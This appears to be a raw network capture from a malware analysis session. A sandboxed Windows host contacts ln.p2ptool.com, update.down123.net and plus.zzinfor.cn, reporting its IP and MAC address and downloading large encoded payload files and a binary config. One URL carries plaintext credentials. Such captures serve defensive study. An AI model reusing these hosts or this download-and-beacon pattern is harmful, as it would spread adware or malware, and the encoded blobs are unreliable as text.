Last-Modified: Fri, 06 Nov 2015 14:52:13 GMT
Connection: close
ETag: "563cbe9d-4590"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROKjttvFmiakCZt5yAEloqcdFU3c0qOtFRYDZAdH
Hwb Qxt9I jqSgc4ULm66opXrWBkOiGdpJ xQoMTH3OmgMQJkUShelUIsDfL/hdCWFtkn/
y62uU0mNGqMsAApyLHJ4j6aH00q0LLsr6FlXJFw9vDIbA8NM/MBAcsX/7BlxWcm jOrtHz
XNJwHVr1zBaZBvDIhS24H2g4292X8RJor98PJ/3Y RAHLFiBns21a08LzZ9NQJKMqlTtge
75/mtJONL4g mIuCzv1s5vG78A6DGTbVaOa1tXM1tCuQn5reB/GadtqV6Y5LJt7Ek3k/W2
aZ85m6MostnYNXS5PA1dBcmiDVyHpS9CA/ZF3msze1qfmM4ySmpBTxy1O5vT wkQGvUjqJ
OUSqN7 bFBWSdZKyfDWgfcJ5BEK rYVr4Ti1ZvAVDdS9TT0sp1QglzpGQ7ATTd2J nZGQ
wwbwoUSDkEDD/jk3M/k5HFHcsbNHhOchtR0U1l60XX357YnLbrtgMM24tPM5IuTMWwWZew
nxW8JOIptenBO3ZCnKp1kJtXgfe1UW4uGAjNlmR1fKC L/NftvcUWkpO9eliCl2AfmFx/q
gZ13w8PyvLPTXcL JXD5HyRaMQdZ9Y7YcIDfT0iBIhvTM5jY66l3DbzUJcXQNKlZgqSb8
Ae/V2PH/qVC6zaNt9XzQFqYllpIjfOSbQ7ki3aXAJVFiW6v36EHjFGWhMWrbTuoJTZfRk6
hAkN4gK3q3Z1tP8vDNMzE/D7lZg9mIww7esNKBvDHYPwFmdbrZOFClhIIzcEryxXp2kGPf
rBsQqtlv3i8iM3CgETUyfIVMbla/r4MeVT60Etch7IV4MKloRceCEaHUIUEsGpfKiTsLH4
l5FkFAOIc3buJHaeAMAmh7Xojqnpz f/tYFXf2j1pee3DTbhsT82ABDkRytOsKxFXiAuof
NV2GHabjaUOJQ6mxSx8oPqfELHIPn1p5WgBmct5GdqTfL3bMRF95j5esatBQcGwPgULXT4
RnY9gix5OJKSK0ajYbXQG7I8LIt7IZTOzLWFySDobY2xdfxLtQybtJZsMP5pvpqhsEWYZU
wLMKhdFzYWEYNMUGUipV/spHDdbiVSrjhP9b/qwVyW6YFLoiO7uVwvsrX 14gkE ted0Fm
zahoKLwWTeoxgP5l8NNC2S4mDakhpSpLhK/UwVQ5/Drrjs5c9WLgqTwr6e3lBGIRg0ZBKi
eftYq0gI9u9aqmfDv145VCYstieNcaIFj2Iv/A/o7REZEvT4V2cS4biMlG4duycqvLpBka
Fhyg3GPNDAHGzziZISsm5psTMviD6Yi4LO/WXVjfp5EIfQ8ySqMTmVe/CcLz/v6BdJXF4J
7nCND/v2Ho5LnzeIeKyScOGHbxpIXGwz5Bmp7YZJm1Lj Lt4SWIq6OULu3vMH eoC/mJ k
A15SGWTSvEPvDvFy6X6sH0VAKKIWpnEtiaLhYCFIZ7MkkDIfQ3wN50TZmRvl620owG

<<< skipped >>>

GET /txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 1840480
Last-Modified: Wed, 30 Sep 2015 02:45:35 GMT
Connection: close
ETag: "560b4ccf-1c1560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJuacViNEyUzNtsQ1NYTf8d27GQD/J9XGD4qYxi8v
xIiixIcnCOyBlOFqr9ETxrT SBHjArMiqMiHMIxSfRWU4KPY5pTF7DF2xKszLM0SuU/GyP
DEKip3LDGtIHKgAjlwGoaHXIorCjbMTazQ2ZSPlr5flXLXC5JH3rPV7VCE5C4Yz4h3K0AO
lFthiN4cVI3AP3NdgUfwDLK6r5zh2O0mhQ43fNWIPwFNWXJyfQNpBOtYm ARi1SoBtib4B
GLVKgG0V2AJJhDBVqEnSGpMq4o L6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
uKOtlnCKi AJIKLreHt1XkxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrObdsagrdZm/E2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrmemWon5Q0qfE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr y6jpxuwh2p u92whz 8tvE2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPV9cZRQclYDv0cRH5FzB75MxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWDx
WdJSNxrGJ7Zm5VGZfamcTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWLGPOS2/c nLVhRzQsiY
Eo7E2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5OX8lKKswkonGwm ElZZQzib/wxCcfowCJZ
YUINYVTz1wg5aryKKMjyVskrcu QLtkrK5piaVn9RyE0rmYnzCbUjapOQdShugPmV6dHZs
IK5F58pVNTdf3jCmkkLn7p8wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uN1W2huWLpgU

<<< skipped >>>

GET /txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Y
e5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLE
Onja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9h
subAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6d
hDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMR
hz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HV
CyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 U
IxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9
AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6p
sVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgI
LxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9
Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygN
WYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55z
wjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xa
vSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4neby
iCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Ob
a8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT0
1I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1i
mxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq je
NXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTR
bs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapa
jXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW

<<< skipped >>>

GET /txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 111968
Last-Modified: Tue, 22 Sep 2015 02:26:44 GMT
Connection: close
ETag: "5600bc64-1b560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wr
MOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3
TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3
dBEoYcUYdhA1na912G4GnwNPyGigPuwU4WnDUHq/HLA1JSzVcV7qGonkM3kaB6fPbglycn
0DaQTrXm/H8aJaRsqeb8fxolpGypNTPeVZu3tFqtj4tOAGKUF sMaJudVXlW6wxom51VeV
ZRJhvIVRruRJIWa4B0YS20w3O2oa8Ns9uggHzpTR0yccTazQ2ZSPlrxNrNDZlI WvI/pOI
CuWZe8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk l
eK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ75v2Ipn 4qo34DqKck/Lvt8TazQ2ZSPlrEk
Yhq4qBTrw/Rp3LuKWWWAJO4gv6AT3UO7thRRNagkrE2s0NmUj5a3C2I9Jaq5QixNrNDZlI
WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oQQoy6/oPEBqxo0 qZuAtWoPgJ yR1ZwZZREMMJf0vpc4SZ8ce zsmIwA6jAbzQgABzI
bqI92FStTOY2Qoonvg2rVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r
648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ4Ods4aXXBrdpBepmeh2dZe/TnDXSN51O5

<<< skipped >>>

GET /tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=gb2312
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 1
1....



GET /deploy.php?ConFig=xz9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 2
9eHTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/7.5.
.X-Powered-By: PHP/5.3.6..Date: Wed, 11 Nov 2015 11:17:50 GMT..Content
-Length: 2..9e..


GET /txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:41 GMT
Content-Type: text/plain
Content-Length: 433608
Last-Modified: Fri, 06 Nov 2015 14:22:14 GMT
Connection: close
ETag: "563cb796-69dc8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjTh
fOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4
bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK
pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHB
OK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRS
I7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz

<<< skipped >>>

GET /plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 11 Nov 2015 11:18:03 GMT
Server: Tengine/2.0.3
Content-Type: application/octet-stream
Content-Length: 1549
Expires: Wed, 11 Nov 2015 11:18:03 GMT
Cache-Control: max-age=0
X-Via: 1.1 bl15:2 (Cdn Cache Server V2.0)
Connection: close
....<.......`-8...\.Q...V.i..`-*......................-............
....................................T.................................
......................................................]...`..........a
....a..<....h2zov."uu&e9".z-...B....WJB.E.MYNjDn..Bok"atvxvu(r.RY._
Q.C2:/|lK.....k....p...0j...)...$...zV....................,.../p9*t?..
'XVI.AoFGP..Y......WW]*|(:n.BUG82qyb...................`...`..._..Z.sE
. d.....9....gO.....YV.ZM.".G>....P..5ng._......V..scJ..]..rfgw 4#=
'F.N5m;zr=o0\.....h...D...R..#.........-_.....D,.14#q>y)[t3#4=tQ.4.
...........................................................j..........
.".4..0L....A.....U/w< >q`y(W.7..2jzU5...I}!{2&dNk$re, .;t>w*
#h7rz4 #}w"p{WWAZ.t!4A5f:2=#\LG.......h....E..K......W.0...!......ER5'
.W..C1)5dN ."2H4......................................................
......f.......T..:._...\.r*.........................3...H.UD8i..80}g=l
p^[email protected]( 4w! 9. zD0=$74a{>&y(92}D.S.....c...P(...v..P.Yr.U...."..
...................2...|lkz!$ME..&yjz3/he#. D...W.IFE.R6)Y._P\...d...A
.)>.....q...`.!....7.&.Vz...Y.Y.....vuH..R.P...5q}LR{f%ybV< ...a
?ud.I&'..]G.]so(%.t}34...^..)h<i..X....Nqm..../ty~n.... {:h.sl...L.
.......&h..|@.V$7......Fw6b4$.;.W!.SIzw=;tb~1.3...`2}%&d..AJ^Fw1"..^.1
=a^.D...IYT. Y..YF.J..\....(i]{.....X...`...F.S......h.4..B.....O...I'
...2-.....................................................]...`U..)..o
e..=..p...u.......,6R,(n].`,...<, :ad..RGf9*:so(%cM`.MIY[E.ZM,W:j;x
2;*....5....{mqdV.].......%.. Fm..o...........UMZ..&<0dV.X.V..&

<<< skipped >>>

GET /txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 3681632
Last-Modified: Wed, 11 Nov 2015 06:37:41 GMT
Connection: close
ETag: "5642e235-382d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnK8LkCEjjVuY w9ubR7oMGJYDX66FKP95lKsnSGyz
q37ryciPXfvjMPpcqzf2tJHexhfLNc fok6tpr37HNZkoDA9b8f9QQXkBG dX3CMR0/NFC
P83aLsI5BiAzHCQ3JAlQ4FJlQ856TPZm3LkrIF6N30ifaKq p83E2s0NmUj5a X5Vy1wuS
R9dWtS4hPXoQyM IdytADpRVo8JE43dQFFipIaFHMmto3ZU4PHim6WzGQ7DQYttXN9lycn
0DaQTrWJvgEYtUqAbYm ARi1SoBt9qL31Z27Nj27cK3hD49V5esMaJudVXlW6wxom51VeV
ZRJhvIVRruRMTazQ2ZSPlrCvj4xkq/yU dGfvGf0Yne8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a94BsqzULTQfxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay
2oS4kGYrQWxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 P0P g8Q5mb8w4ic
KoxcxNrNDZlI WsxOHUkBOoRd2lephKWY2T1ZZGE77pEw2mANord1TbnucTazQ2ZSPlr6p
KcJrWMBIP1qhO0HLK1lmKAsO86F254kLg6MOgYGj/E2s0NmUj5a3C2I9Jaq5QiP0ady7il
lljiF3sq2aCnyzX0okfCmeuexNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a9SIyelpSHqnq1q0Btc2nwSKz5eXbq 3w0SO
47vccmRiCV8k2Qip9g2z6Qsnr5fEBHZURWDBkbGIFM2XpBtTMgGe6Uq978GK26oCTYylcP
SYk0BRHzuKCIFn44m2tyaRZ1koSJZKpXd/OHf 9s28bCOsp5XACOqJfX5nhXmBTF9k

<<< skipped >>>

GET /txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMl
j6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj
8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVK
k 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWa
brDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0N
mUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxf
KZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSB
J/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI
WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp
3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHddua
D uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAW
uIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN
4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A

<<< skipped >>>

GET /txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:48 GMT
Content-Type: text/plain
Content-Length: 2198880
Last-Modified: Thu, 18 Jun 2015 01:46:51 GMT
Connection: close
ETag: "5582230b-218d60"
Accept-Ranges: bytes
